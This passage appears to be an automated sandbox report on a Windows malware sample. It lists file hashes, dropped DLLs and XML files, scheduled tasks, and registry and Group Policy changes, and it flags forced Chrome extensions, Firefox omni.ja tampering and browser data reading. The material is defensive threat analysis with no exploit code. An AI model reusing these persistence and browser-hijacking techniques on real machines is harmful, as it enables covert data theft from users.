SHA512 0f787366d74fc5f4a520b4ac2695c3ba1a89eb4dc70daf68894ddaa081f556fda8b261bfb9a8fd7d736058afbbe648de912acf4f2c845248e578a76ecd78f7db

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml

MD5 61a55f05dead9e59252bffad748dca04
SHA1 5cc5628dc813077d3ad54c48a00decf9d0db2104
SHA256 ab7bac0687a00f1fd10e4e337900ae8dc1c7a72ca811620a2b03b1777f09eec5
SHA512 d9645454103f0b70537967054112f34026e686b81ed12bf8f478ef0e4412d2219d5cf33685648a35e0286d80592954a368d9f7b93d443f4a2e1083ab32b0d5a5

C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml

MD5 315eb76dd743d4dd464f26537d2ef3e7
SHA1 eb09261f83548e89fccbde349751a99cdc6c77a9
SHA256 2c90f8f7017d0e83c29783c781f105386ca9d0df18a4c141c6d8ec0d359b651f
SHA512 2c7bf3422a23b09e550afd49d09f7156a9747fbf6ca0c9a2da04342d48a271b278e3ead06236048e4878f6669489b00547855e6acf89d703391092869fc6ab38

C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll

MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

memory/1480-491-0x00000000037E0000-0x000000000386A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f97d9gc7.default-release\prefs.js

MD5 d9a698298df9396c239d3af6d9f0d12c
SHA1 72e67e26785adecfd4d49bad40a5f47b0ba13a46
SHA256 33a5c704ffbe3308bfb04688e95ee971560b62f2944cbf1717ce09b952e0db25
SHA512 c67d57646e629de25a24876b24f842ccb4e548349f5e67a8a23822a30c3caf6e9f0304f1d72f51e67b2725a85d70930f4f2113e302c93257769f62ab01c2debb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 b750517d9a8a819c31e5fae1497be7f5
SHA1 a6943ce44dadf7cc84f7982ebe0b320b8b39e3ca
SHA256 8f1ac4af8bea6c885ea471794a7ff15c22337002de0c771cb46a01cdb4900394
SHA512 38a1a5479420ca4c76dd5e515f166d4a97c271b57977ded7d1fa1a3d4a58528a1ea4c8dea45b2d19b766fc72694f0eb5fada362f106ee984a4b7bc24ff0f0c36

memory/2096-501-0x00000000012C0000-0x00000000018A8000-memory.dmp

memory/1480-509-0x00000000039C0000-0x0000000003A95000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8c70623a41f13f4b3f5ff4b935f637fe
SHA1 c6d94c98bb31a26dfc5f3ec6aa6adf7367603fa8
SHA256 3dfa2e4ca61f08ec3b936a0885637bec8ca34ea6ba913ef0ca686c900c8e46d6
SHA512 fe7b716776e98882749e2d59733d029addef041da8095f6ff458af9d6d962139ac4329af1dcae69197a4d2492aed128b4c98978ada5b80bf5cbd2d805466c84c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d4f2005deb3396f5e0fadef016bdf38f
SHA1 fa9d7a186313aaa52f81301972789f4f977aa70d
SHA256 92a36ad675bf3d09851e35792033d08c5aaac355bf47b7d61a4bf13e448120b8
SHA512 ccf0ac4b2b53b75af699fd6c67fdc698f0bb58b158f20b2d35154bf664ca8c1b7f2fc12c385fdd486faa8ab09bd898c176a0ef141037aacb3ff28213a09d07f4

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-03 10:41

Reported

2024-04-03 10:44

Platform

win11-20240221-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LCifMpYymZWU2\tWWCHdy.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ftzROSO.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\rcwryes.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\FSRHEKC.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\LRNvgVr.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\zYjinbqzvXXzX.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\txXOAHH.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\YibzXz.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\RiCqWut.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
